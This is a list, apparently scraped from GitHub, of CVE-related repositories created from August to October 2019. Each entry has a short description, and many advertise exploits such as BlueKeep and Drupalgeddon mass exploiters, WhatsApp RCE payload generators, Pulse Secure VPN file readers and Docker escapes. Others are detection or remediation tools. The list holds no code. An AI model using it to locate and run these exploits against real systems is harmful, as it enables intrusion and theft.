**no description** : [FauxFaux/sudo-cve-2019-14287](https://github.com/FauxFaux/sudo-cve-2019-14287) create time: 2019-10-15T06:47:58Z

**no description** : [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://github.com/sharmasandeepkr/PS-2017-13---CVE-2018-9950) create time: 2019-10-15T06:47:00Z

**no description** : [sharmasandeepkr/cve-2018-15968](https://github.com/sharmasandeepkr/cve-2018-15968) create time: 2019-10-15T06:26:08Z

**Directory transversal to remote code execution** : [jas502n/CVE-2019-16278](https://github.com/jas502n/CVE-2019-16278) create time: 2019-10-15T03:40:13Z

**Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215** : [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215) create time: 2019-10-14T17:27:37Z

**Write-up on the CVE-2019-9745 vulnerability.** : [KPN-CISO/CVE-2019-9745](https://github.com/KPN-CISO/CVE-2019-9745) create time: 2019-10-14T09:44:44Z

**CVE-2018-13379 Script for Nmap NSE.** : [Blazz3/cve2018-13379-nmap-script](https://github.com/Blazz3/cve2018-13379-nmap-script) create time: 2019-10-14T04:09:44Z

**Spring Security OAuth 2.3 Open Redirection 分析复现篇** : [BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection](https://github.com/BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection) create time: 2019-10-14T02:15:39Z

**Local Privilege Escalation in HP Support Assistant** : [ManhNDd/CVE-2019-6329](https://github.com/ManhNDd/CVE-2019-6329) create time: 2019-10-13T09:20:16Z

**Interactive-Like Command-Line Console for CVE-2019-16759** : [FarjaalAhmad/CVE-2019-16759](https://github.com/FarjaalAhmad/CVE-2019-16759) create time: 2019-10-12T18:51:16Z

**CVE-2017-14948 for D-Link 880 Firmware** : [badnack/d_link_880_bug](https://github.com/badnack/d_link_880_bug) create time: 2019-10-12T17:29:36Z

**no description** : [chosam2/cve-2019-5736-poc](https://github.com/chosam2/cve-2019-5736-poc) create time: 2019-10-12T07:22:57Z

**no description** : [raystyle/CVE-2019-2215](https://github.com/raystyle/CVE-2019-2215) create time: 2019-10-12T03:22:27Z

**Mass exploit for CVE-2019-0708** : [pwnhacker0x18/Wincrash](https://github.com/pwnhacker0x18/Wincrash) create time: 2019-10-11T20:33:35Z

**Critical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts.** : [LightC0der/Apache-Struts-0Day-Exploit](https://github.com/LightC0der/Apache-Struts-0Day-Exploit) create time: 2019-10-10T13:09:50Z

**CVE-2018-7600 and CVE-2018-7602 Mass Exploiter** : [shellord/Drupalgeddon-Mass-Exploiter](https://github.com/shellord/Drupalgeddon-Mass-Exploiter) create time: 2019-10-10T11:56:29Z

**PoC materials to exploit CVE-2018-6789** : [synacktiv/Exim-CVE-2018-6789](https://github.com/synacktiv/Exim-CVE-2018-6789) create time: 2019-10-10T09:36:03Z

**CVE-2019-0708** : [shishibabyq/CVE-2019-0708](https://github.com/shishibabyq/CVE-2019-0708) create time: 2019-10-10T00:34:41Z

**Python RCE exploit for Apache Spark rewritten from Metasploit module** : [ivanitlearning/CVE-2018-11770](https://github.com/ivanitlearning/CVE-2018-11770) create time: 2019-10-09T16:41:39Z

**The exploit works well until WhatsApp version 2.19.230. The vulnerability is official patched in WhatsApp version 2.19.244** : [alexanderstonec/CVE-2019-11932](https://github.com/alexanderstonec/CVE-2019-11932) create time: 2019-10-09T16:41:38Z

**Outlook iOS Spoofing Vulnerability** : [d0gukank/CVE-2019-1218](https://github.com/d0gukank/CVE-2019-1218) create time: 2019-10-09T16:12:09Z

**PoC materials to exploit CVE-2019-15846** : [synacktiv/Exim-CVE-2019-15846](https://github.com/synacktiv/Exim-CVE-2019-15846) create time: 2019-10-09T15:19:58Z

**The study of vulnerability CVE-2017-3066. Java deserialization** : [cucadili/CVE-2017-3066](https://github.com/cucadili/CVE-2017-3066) create time: 2019-10-09T11:13:00Z

**Blind noSQL injection case study lab based on CVE-2018-3783** : [nisaruj/nosqli-flintcms](https://github.com/nisaruj/nosqli-flintcms) create time: 2019-10-09T07:35:59Z

**KRAMER VIAware 2.5.0719.1034 - Remote Code Execution** : [hessandrew/CVE-2019-17124](https://github.com/hessandrew/CVE-2019-17124) create time: 2019-10-09T04:10:25Z

**Investigation of CVE-2018-11776 vulnerability that allows attackers to remotely execute code and gain control over Apache Struts-based applications.** : [cucadili/CVE-2018-11776](https://github.com/cucadili/CVE-2018-11776) create time: 2019-10-08T23:01:49Z

**no description** : [d3k4z/nmap-cve2019-15846](https://github.com/d3k4z/nmap-cve2019-15846) create time: 2019-10-07T08:40:47Z

**no description** : [infiniteLoopers/CVE-2019-11932](https://github.com/infiniteLoopers/CVE-2019-11932) create time: 2019-10-06T14:54:35Z

**no description** : [spektraq/CVE-2019-WHATSAPP](https://github.com/spektraq/CVE-2019-WHATSAPP) create time: 2019-10-06T14:20:38Z

**Double-Free BUG in WhatsApp exploit poc.** : [TulungagungCyberLink/CVE-2019-11932](https://github.com/TulungagungCyberLink/CVE-2019-11932) create time: 2019-10-05T06:24:08Z

**Rails 3 PoC of CVE-2019-5418** : [ztgrace/CVE-2019-5418-Rails3](https://github.com/ztgrace/CVE-2019-5418-Rails3) create time: 2019-10-04T19:28:10Z

**Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif** : [awakened1712/CVE-2019-11932](https://github.com/awakened1712/CVE-2019-11932) create time: 2019-10-04T14:43:57Z

**This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)** : [KeepWannabe/WhatsRCE](https://github.com/KeepWannabe/WhatsRCE) create time: 2019-10-04T13:45:44Z

**no description** : [timwr/CVE-2019-2215](https://github.com/timwr/CVE-2019-2215) create time: 2019-10-04T06:32:08Z

**Remediation task for CVE-2018-15686, CVE-2018-16866, and CVE-2018-16888 affecting SystemD in EL7** : [hpcprofessional/remediate_cesa_2019_2091](https://github.com/hpcprofessional/remediate_cesa_2019_2091) create time: 2019-10-03T21:26:04Z

**Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115** : [CSSProject/libssh2-Exploit](https://github.com/CSSProject/libssh2-Exploit) create time: 2019-10-03T17:58:03Z

**Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115** : [viz27/Libssh2-Exploit](https://github.com/viz27/Libssh2-Exploit) create time: 2019-10-03T17:26:08Z

**Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0 | XSS to RCE** : [MAYASEVEN/CVE-2019-12562](https://github.com/MAYASEVEN/CVE-2019-12562) create time: 2019-10-03T16:29:58Z

**double-free bug in WhatsApp exploit poc** : [dorkerdevil/CVE-2019-11932](https://github.com/dorkerdevil/CVE-2019-11932) create time: 2019-10-03T09:26:24Z

**harbor(<1.7.6/1.8.3) privilege escalation (CVE-2019-16097)** : [theLSA/harbor-give-me-admin](https://github.com/theLSA/harbor-give-me-admin) create time: 2019-10-02T16:53:06Z

**CVE-2019-16759 vbulletin 5.0.0 till 5.5.4 pre-auth rce** : [theLSA/vbulletin5-rce](https://github.com/theLSA/vbulletin5-rce) create time: 2019-10-02T16:46:43Z

**CVE-2019-17080** : [Andhrimnirr/Mintinstall-object-injection](https://github.com/Andhrimnirr/Mintinstall-object-injection) create time: 2019-10-02T08:26:34Z

**Connect Box CH7465LG (CVE-2019-13025)** : [x1tan/CVE-2019-13025](https://github.com/x1tan/CVE-2019-13025) create time: 2019-10-01T20:53:47Z

**PoC for CVE-2019-16941** : [purpleracc00n/CVE-2019-16941](https://github.com/purpleracc00n/CVE-2019-16941) create time: 2019-10-01T10:26:27Z

**A simple exploit for CVE-2007-2447** : [b1fair/smb_usermap](https://github.com/b1fair/smb_usermap) create time: 2019-09-30T21:06:09Z

**ispy V1.0 - Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) Scanner and exploit ( Metasploit automation )** : [Cyb0r9/ispy](https://github.com/Cyb0r9/ispy) create time: 2019-09-30T19:46:21Z

**Arbitrary file read in BlueStacks** : [seqred-s-a/cve-2019-14220](https://github.com/seqred-s-a/cve-2019-14220) create time: 2019-09-30T12:57:35Z

**no description** : [jltxgcy/CVE_2019_2025_EXP](https://github.com/jltxgcy/CVE_2019_2025_EXP) create time: 2019-09-30T02:40:21Z

**PoC of CVE-2018-14847 Mikrotik Vulnerability using simple script** : [sinichi449/Python-MikrotikLoginExploit](https://github.com/sinichi449/Python-MikrotikLoginExploit) create time: 2019-09-29T12:21:16Z

**Jenkins Git Client RCE CVE-2019-10392_Exp** : [ftk-sostupid/CVE-2019-10392_EXP](https://github.com/ftk-sostupid/CVE-2019-10392_EXP) create time: 2019-09-29T11:22:41Z

**it works on xp (all version sp2 sp3)** : [coolboy4me/cve-2019-0708_bluekeep_rce](https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce) create time: 2019-09-29T07:38:41Z

**Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.** : [0vercl0k/CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708) create time: 2019-09-29T07:08:52Z

**cve_20190708复现使用到的镜像及工具** : [Huandtx/cve_20190708](https://github.com/Huandtx/cve_20190708) create time: 2019-09-28T09:58:18Z

**POC to check for Jira instances vulnerable to CVE-2019-8451** : [h0ffayyy/Jira-CVE-2019-8451](https://github.com/h0ffayyy/Jira-CVE-2019-8451) create time: 2019-09-28T01:01:26Z

**Exploit code for CVE-2019-16692** : [kkirsche/CVE-2019-16692](https://github.com/kkirsche/CVE-2019-16692) create time: 2019-09-27T13:18:00Z

**A tool that detect if your node has been victim of the invalid funding tx attack.** : [ACINQ/detection-tool-cve-2019-13000](https://github.com/ACINQ/detection-tool-cve-2019-13000) create time: 2019-09-27T08:07:07Z

**A tool to check if your lnd node was targeted by CVE-2019-12999** : [lightninglabs/chanleakcheck](https://github.com/lightninglabs/chanleakcheck) create time: 2019-09-27T03:47:09Z

**CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)** : [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392) create time: 2019-09-26T05:45:00Z

**Jira未授权SSRF漏洞** : [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451) create time: 2019-09-26T05:06:11Z

**vBulletin 5.x 未授权远程代码执行漏洞** : [jas502n/CVE-2019-16759](https://github.com/jas502n/CVE-2019-16759) create time: 2019-09-26T03:56:22Z

**Nmap NSE Script to Detect vBulletin pre-auth 5.x RCE CVE-2019-16759** : [r00tpgp/http-vuln-CVE-2019-16759](https://github.com/r00tpgp/http-vuln-CVE-2019-16759) create time: 2019-09-26T03:27:17Z

**no description** : [jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-](https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-) create time: 2019-09-25T16:22:56Z

**Vbulletin rce exploit CVE-2019-16759** : [M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit](https://github.com/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit) create time: 2019-09-25T16:12:27Z

**cve-2019-1609** : [dacade/cve-2019-16097](https://github.com/dacade/cve-2019-16097) create time: 2019-09-25T02:05:49Z

**PoC for distributed NTP reflection DoS (CVE-2013-5211)** : [sepehrdaddev/ntpdos](https://github.com/sepehrdaddev/ntpdos) create time: 2019-09-24T20:02:43Z

**Exploit for XSS via BBCode on Kunena extension before 5.1.14 for Joomla!** : [h3llraiser/CVE-2019-15120](https://github.com/h3llraiser/CVE-2019-15120) create time: 2019-09-24T12:47:09Z

**no description** : [ianxtianxt/CVE-2019-8451](https://github.com/ianxtianxt/CVE-2019-8451) create time: 2019-09-24T11:38:20Z

**CVE-2018-13379 Exploit** : [0xHunter/FortiOS-Credentials-Disclosure](https://github.com/0xHunter/FortiOS-Credentials-Disclosure) create time: 2019-09-24T08:49:46Z

**CVE-2019-1367** : [mandarenmanman/CVE-2019-1367](https://github.com/mandarenmanman/CVE-2019-1367) create time: 2019-09-24T06:11:10Z

**Exploit for CVE-2019-11043** : [neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam) create time: 2019-09-23T21:37:27Z

**Built a custom Virtual Machine, running Ubuntu 18.04.1 and Webmin 1.810. Using CVE-2019-15107 to exploit a backdoor in the Linux machine** : [Rayferrufino/Make-and-Break](https://github.com/Rayferrufino/Make-and-Break) create time: 2019-09-23T14:07:03Z

**CVE-2018-14667-poc Richfaces漏洞环境及PoC** : [Venscor/CVE-2018-14667-poc](https://github.com/Venscor/CVE-2018-14667-poc) create time: 2019-09-23T07:45:01Z

**no description** : [ianxtianxt/CVE-2019-16097](https://github.com/ianxtianxt/CVE-2019-16097) create time: 2019-09-22T11:24:28Z

**CVE-2019-16097-batch** : [rockmelodies/CVE-2019-16097-batch](https://github.com/rockmelodies/CVE-2019-16097-batch) create time: 2019-09-20T02:03:45Z

**no description** : [mdnix/cve-2018-1002105](https://github.com/mdnix/cve-2018-1002105) create time: 2019-09-19T19:08:02Z

**CVE-2019-16097 PoC** : [evilAdan0s/CVE-2019-16097](https://github.com/evilAdan0s/CVE-2019-16097) create time: 2019-09-19T15:12:11Z

**no description** : [InfoSecJack/CVE-2018-6574](https://github.com/InfoSecJack/CVE-2018-6574) create time: 2019-09-19T14:36:45Z

**no description** : [GitHubAssessments/CVE_Assessment_08_2019](https://github.com/GitHubAssessments/CVE_Assessment_08_2019) create time: 2019-09-19T02:02:05Z

**5.1.17之前的Linux内核中普通用户执行文件提权为root用户** : [Huandtx/CVE-2019-13272](https://github.com/Huandtx/CVE-2019-13272) create time: 2019-09-19T01:58:35Z

**macOS Kernel Exploit for CVE-2019-8781. Credit for the bug goes to @LinusHenze :)** : [A2nkF/macOS-Kernel-Exploit](https://github.com/A2nkF/macOS-Kernel-Exploit) create time: 2019-09-17T17:59:26Z

**Crestron/Barco/Extron/InFocus/TeqAV Remote Command Injection (CVE-2019-3929) Metasploit Module** : [xfox64x/CVE-2019-3929](https://github.com/xfox64x/CVE-2019-3929) create time: 2019-09-17T16:23:04Z

**no description** : [wzxmt/CVE-2019-1040](https://github.com/wzxmt/CVE-2019-1040) create time: 2019-09-17T15:53:25Z

**no description** : [wzxmt/CVE-2017](https://github.com/wzxmt/CVE-2017) create time: 2019-09-17T15:52:00Z

**CVE-2019-14830** : [Fr3d-/moodle-token-stealer](https://github.com/Fr3d-/moodle-token-stealer) create time: 2019-09-17T09:04:41Z

**Escape from Docker using CVE-2017-1000112 and CVE-2017-18344, including gaining root privilage, get all capbilities, namespace recovery, filesystem recovery, cgroup limitation bypass and seccomp bypass.** : [hikame/docker_escape_pwn](https://github.com/hikame/docker_escape_pwn) create time: 2019-09-17T07:38:47Z

**CVE-2019-14912 PoC** : [Wocanilo/adaPwn](https://github.com/Wocanilo/adaPwn) create time: 2019-09-17T07:24:23Z

**no description** : [1aa87148377/CVE-2019-0708](https://github.com/1aa87148377/CVE-2019-0708) create time: 2019-09-17T05:15:28Z

**Modified standalone exploit ported for Python 3** : [ivanitlearning/CVE-2018-12613](https://github.com/ivanitlearning/CVE-2018-12613) create time: 2019-09-16T12:14:52Z

**https://jira.atlassian.com/browse/JRASERVER-69793** : [0xbug/CVE-2019-8451](https://github.com/0xbug/CVE-2019-8451) create time: 2019-09-16T10:39:40Z

**CVE_2019_15107 Webmin 1.920 Remote Code Execution Exploit** : [g0db0x/CVE_2019_15107](https://github.com/g0db0x/CVE_2019_15107) create time: 2019-09-15T22:38:15Z

**CVE-2019-0604: SharePoint RCE detection rules and sample PCAP** : [m5050/CVE-2019-0604](https://github.com/m5050/CVE-2019-0604) create time: 2019-09-15T20:06:54Z

**Tool to exploit CVE-2018-7284 and CVE-2018-19278** : [Rodrigo-D/astDoS](https://github.com/Rodrigo-D/astDoS) create time: 2019-09-15T17:20:51Z

**Unauthenticated RCE at Woody Ad Snippets / CVE-2019-15858 (PoC)** : [GeneralEG/CVE-2019-15858](https://github.com/GeneralEG/CVE-2019-15858) create time: 2019-09-12T21:52:55Z

**PoC for CVE-2017-0075** : [4B5F5F4B/HyperV](https://github.com/4B5F5F4B/HyperV) create time: 2019-09-12T02:45:07Z

**AppXSvc Arbitrary File Security Descriptor Overwrite EoP** : [sgabe/CVE-2019-1253](https://github.com/sgabe/CVE-2019-1253) create time: 2019-09-11T23:28:59Z

**Poc for CVE-2019-1253** : [padovah4ck/CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253) create time: 2019-09-11T20:40:15Z

**investigate vulnerability of opgp-service to message signature bypass (CVE-2019-9153) of openpgp** : [ZenyWay/opgp-service-cve-2019-9153](https://github.com/ZenyWay/opgp-service-cve-2019-9153) create time: 2019-09-11T17:17:03Z

**CVE-2019-0708 C#验证漏洞** : [0xFlag/CVE-2019-0708-test](https://github.com/0xFlag/CVE-2019-0708-test) create time: 2019-09-11T10:58:04Z

**no description** : [likescam/CVE-2019-1253](https://github.com/likescam/CVE-2019-1253) create time: 2019-09-11T09:59:22Z

**no description** : [distance-vector/CVE-2019-0708](https://github.com/distance-vector/CVE-2019-0708) create time: 2019-09-11T02:19:19Z

**Local privilege escalation PoC exploit for CVE-2019-16098** : [Barakat/CVE-2019-16098](https://github.com/Barakat/CVE-2019-16098) create time: 2019-09-10T15:57:36Z

**CVE- 2019-0708 مرحبا هذه هي ثغرة الارديبي الاخيرة رقمها** : [zecopro/bluekeep](https://github.com/zecopro/bluekeep) create time: 2019-09-10T14:54:27Z

**no description** : [0x6b7966/CVE-2018-1999002](https://github.com/0x6b7966/CVE-2018-1999002) create time: 2019-09-10T05:23:48Z

**no description** : [securifera/CVE-2019-1579](https://github.com/securifera/CVE-2019-1579) create time: 2019-09-10T02:53:03Z

**Proof of Concept (PoC) for CVE: 2017-16744 and 2017-16748** : [GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara](https://github.com/GainSec/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara) create time: 2019-09-09T19:08:59Z

**CVE 2019-5791 working exploit** : [cosdong7/chromium-v8-exploit](https://github.com/cosdong7/chromium-v8-exploit) create time: 2019-09-09T16:47:43Z

**CVE 2019-2525 & CVE 2019-2548 working exploit** : [cosdong7/VirtualBox-6.0.0-exploit](https://github.com/cosdong7/VirtualBox-6.0.0-exploit) create time: 2019-09-09T16:24:31Z

**Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)** : [BishopFox/pwn-pulse](https://github.com/BishopFox/pwn-pulse) create time: 2019-09-09T15:58:39Z

**https://fuzzit.dev/2019/07/11/discovering-cve-2019-13504-cve-2019-13503-and-the-importance-of-api-fuzzing/** : [hazedic/fuzzenv-exiv2](https://github.com/hazedic/fuzzenv-exiv2) create time: 2019-09-08T12:58:45Z

**CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15** : [mai-lang-chai/Middleware-Vulnerability-detection](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection) create time: 2019-09-08T01:13:59Z

**CVE-2019-0708-EXP(MSF) Vulnerability exploit program for cve-2019-0708** : [qing-root/CVE-2019-0708-EXP-MSF-](https://github.com/qing-root/CVE-2019-0708-EXP-MSF-) create time: 2019-09-07T14:02:50Z

**CVE-2019-0708 With Metasploit-Framework Exploit** : [FrostsaberX/CVE-2019-0708](https://github.com/FrostsaberX/CVE-2019-0708) create time: 2019-09-07T07:32:14Z

**no description** : [cpkkcb/CVE-2019-0708-BlueKeep](https://github.com/cpkkcb/CVE-2019-0708-BlueKeep) create time: 2019-09-07T06:50:47Z

**CVE-2019-0708RDP MSF** : [Micr067/CVE-2019-0708RDP-MSF](https://github.com/Micr067/CVE-2019-0708RDP-MSF) create time: 2019-09-07T06:32:25Z

**CVE-2019-0708 POC RCE 远程代码执行getshell教程** : [mai-lang-chai/CVE-2019-0708-RCE](https://github.com/mai-lang-chai/CVE-2019-0708-RCE) create time: 2019-09-07T05:15:23Z

**initial exploit for CVE-2019-0708, BlueKeep CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.** : [wqsemc/CVE-2019-0708](https://github.com/wqsemc/CVE-2019-0708) create time: 2019-09-07T00:28:45Z

**bluekeep exploit** : [NAXG/cve_2019_0708_bluekeep_rce](https://github.com/NAXG/cve_2019_0708_bluekeep_rce) create time: 2019-09-06T21:39:36Z

**Metasploit module for CVE-2019-0708 (BlueKeep) - https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp** : [RickGeex/msf-module-CVE-2019-0708](https://github.com/RickGeex/msf-module-CVE-2019-0708) create time: 2019-09-06T19:46:03Z

**Bluekeep(CVE 2019-0708) exploit released** : [TinToSer/bluekeep-exploit](https://github.com/TinToSer/bluekeep-exploit) create time: 2019-09-06T17:03:53Z

**Automated Root Script for MediaTek armv8 devices using MediaTek-SU/mtk-su (CVE-2020-0069).** : [R0rt1z2/AutomatedRoot](https://github.com/R0rt1z2/AutomatedRoot) create time: 2019-09-06T12:12:48Z

**CVE-2019-10149** : [ChrissHack/exim.exp](https://github.com/ChrissHack/exim.exp) create time: 2019-09-05T20:04:14Z

**webcam bug (python)** : [likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool](https://github.com/likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool) create time: 2019-09-05T14:45:16Z

**no description** : [jaychouzzk/Pulse-Secure-SSL-VPN-CVE-2019](https://github.com/jaychouzzk/Pulse-Secure-SSL-VPN-CVE-2019) create time: 2019-09-04T17:01:42Z

**Exploit for the Post-Auth RCE vulnerability in Pulse Secure Connect** : [0xDezzy/CVE-2019-11539](https://github.com/0xDezzy/CVE-2019-11539) create time: 2019-09-04T13:06:02Z

**no description** : [jaychouzzk/CVE-2019-0193-exp](https://github.com/jaychouzzk/CVE-2019-0193-exp) create time: 2019-09-03T21:16:24Z

**no description** : [Lynggaard91/windows2016fixCVE-2017-8529](https://github.com/Lynggaard91/windows2016fixCVE-2017-8529) create time: 2019-09-03T20:39:59Z

**Proof of Concept of ESP32/8266 Wi-Fi vulnerabilties (CVE-2019-12586, CVE-2019-12587, CVE-2019-12588)** : [Matheus-Garbelini/esp32_esp8266_attacks](https://github.com/Matheus-Garbelini/esp32_esp8266_attacks) create time: 2019-09-03T15:08:49Z

**no description** : [MelroyB/CVE-2019-14319](https://github.com/MelroyB/CVE-2019-14319) create time: 2019-09-03T11:29:51Z

**CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。** : [skommando/CVE-2019-0708](https://github.com/skommando/CVE-2019-0708) create time: 2019-09-03T10:25:48Z

**A script to Fuzz and and exploit Apache struts CVE-2017-9805** : [UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit](https://github.com/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit) create time: 2019-09-02T22:24:07Z

**It will determine your website is vulnerabale to Pulse VPN Vulnerability or not. simply just enter the name of the website.** : [sp4rkhunt3r/CVE2019-11510](https://github.com/sp4rkhunt3r/CVE2019-11510) create time: 2019-09-01T11:57:23Z

**Webmin Remote Code Execution (authenticated)** : [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) create time: 2019-09-01T09:28:56Z

**simplified version of https://github.com/shauntdergrigorian/cve-2006-6184** : [b03902043/CVE-2006-6184](https://github.com/b03902043/CVE-2006-6184) create time: 2019-09-01T04:18:53Z

**Simple python script to fuzz site for CVE-2017-9805** : [UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-](https://github.com/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-) create time: 2019-08-31T22:06:31Z

**A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to version 2.28.23.** : [UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC) create time: 2019-08-30T16:32:13Z

**Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞** : [jas502n/CVE-2019-3394](https://github.com/jas502n/CVE-2019-3394) create time: 2019-08-30T07:44:17Z

**ActiveMQ Deserialization RCE** : [jas502n/CVE-2015-5254](https://github.com/jas502n/CVE-2015-5254) create time: 2019-08-30T06:03:51Z

**[CVE-2018-5728] Terminal Satelitales Seatel exponen geolocalización** : [ezelf/seatel_terminals](https://github.com/ezelf/seatel_terminals) create time: 2019-08-29T19:09:35Z

**no description** : [jason3e7/CVE-2019-11510](https://github.com/jason3e7/CVE-2019-11510) create time: 2019-08-29T07:27:57Z

**CVE2019-2017 POC** : [grmono/CVE2019-2017_POC](https://github.com/grmono/CVE2019-2017_POC) create time: 2019-08-27T20:14:45Z

**SSL VPN Rce** : [jas502n/CVE-2019-11510-1](https://github.com/jas502n/CVE-2019-11510-1) create time: 2019-08-27T09:21:10Z

**Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510** : [r00tpgp/http-pulse_ssl_vpn.nse](https://github.com/r00tpgp/http-pulse_ssl_vpn.nse) create time: 2019-08-27T03:04:19Z

**PoC for CVE-2019-11510 | Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure vulnerability** : [es0/CVE-2019-11510_poc](https://github.com/es0/CVE-2019-11510_poc) create time: 2019-08-26T23:30:15Z

**A collection of tools for the Janus exploit [CVE-2017-13156].** : [giacomoferretti/janus-toolkit](https://github.com/giacomoferretti/janus-toolkit) create time: 2019-08-25T16:31:16Z

**OpenSSH Username Enumeration - CVE-2016-6210** : [justlce/CVE-2016-6210-Exploit](https://github.com/justlce/CVE-2016-6210-Exploit) create time: 2019-08-25T07:23:44Z

**no description** : [Pichuuuuu/CVE-2019-15107](https://github.com/Pichuuuuu/CVE-2019-15107) create time: 2019-08-25T05:31:11Z

**The official exploit code for FusionPBX v4.4.8 Remote Code Execution CVE-2019-15029** : [mhaskar/CVE-2019-15029](https://github.com/mhaskar/CVE-2019-15029) create time: 2019-08-24T19:28:36Z

**The official exploit code for Centreon v19.04 Remote Code Execution CVE-2019-13024** : [mhaskar/CVE-2019-13024](https://github.com/mhaskar/CVE-2019-13024) create time: 2019-08-24T19:26:19Z

**no description** : [LukeJYK/CVE-2019_VIM_test](https://github.com/LukeJYK/CVE-2019_VIM_test) create time: 2019-08-24T07:44:10Z

**Example InSpec profile to detect presence of a malicious rest-client gem (CVE-2019-15224)** : [chef-cft/inspec_cve_2019_15224](https://github.com/chef-cft/inspec_cve_2019_15224) create time: 2019-08-23T20:38:44Z

**CVE-2019-15107 webmin python3** : [AdministratorGithub/CVE-2019-15107](https://github.com/AdministratorGithub/CVE-2019-15107) create time: 2019-08-23T11:10:01Z

**WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit** : [pimps/CVE-2019-2725](https://github.com/pimps/CVE-2019-2725) create time: 2019-08-23T01:42:57Z

**Jboss Java Deserialization RCE (CVE-2017-12149)** : [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149) create time: 2019-08-22T21:06:09Z

**Implementation of CVE-2019-15107 exploit in python** : [ketlerd/CVE-2019-15107](https://github.com/ketlerd/CVE-2019-15107) create time: 2019-08-22T12:07:16Z

**Dockerfiles for CVE-2019-15107(webmin RCE) recurrence including v1.890 and v1.920 with Exp for each version.** : [HACHp1/webmin_docker_and_exp](https://github.com/HACHp1/webmin_docker_and_exp) create time: 2019-08-22T08:48:07Z

**Pulse Secure SSL VPN pre-auth file reading** : [imjdl/CVE-2019-11510-poc](https://github.com/imjdl/CVE-2019-11510-poc) create time: 2019-08-22T08:18:19Z

**no description** : [aforakjackson/cve20186789](https://github.com/aforakjackson/cve20186789) create time: 2019-08-22T01:03:50Z

**GOG Galaxy Exploit for CVE-2019-15511** : [adenkiewicz/CVE-2019-15511](https://github.com/adenkiewicz/CVE-2019-15511) create time: 2019-08-21T13:52:13Z

**Pulse Secure VPN CVE-2019-11510** : [nuc13us/Pulse](https://github.com/nuc13us/Pulse) create time: 2019-08-21T12:03:14Z

**Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)** : [projectzeroindia/CVE-2019-11510](https://github.com/projectzeroindia/CVE-2019-11510) create time: 2019-08-21T08:40:26Z

**jar(linux) for CVE-2017-7525** : [47bwy/CVE-2017-7525](https://github.com/47bwy/CVE-2017-7525) create time: 2019-08-21T07:23:24Z

**CVE-2019-3396 漏洞验证txt与模板文件。** : [skommando/CVE-2019-3396-confluence-poc](https://github.com/skommando/CVE-2019-3396-confluence-poc) create time: 2019-08-21T03:30:53Z

**CVE-2019-14540 Exploit** : [LeadroyaL/cve-2019-14540-exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit) create time: 2019-08-21T03:19:19Z

**no description** : [fade-vivida/CVE-2019-0708-test](https://github.com/fade-vivida/CVE-2019-0708-test) create time: 2019-08-21T00:48:55Z

**(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233** : [l0nax/CVE-2019-15233](https://github.com/l0nax/CVE-2019-15233) create time: 2019-08-20T13:05:56Z

**Exploitation and validation tool for CVE 2015-2080 AKA "JetBlead"** : [6a6f6a6f/CVE-2015-2080](https://github.com/6a6f6a6f/CVE-2015-2080) create time: 2019-08-19T14:41:28Z

**CVE-2019-15107 Webmin RCE (unauthorized)** : [jas502n/CVE-2019-15107](https://github.com/jas502n/CVE-2019-15107) create time: 2019-08-19T07:43:16Z

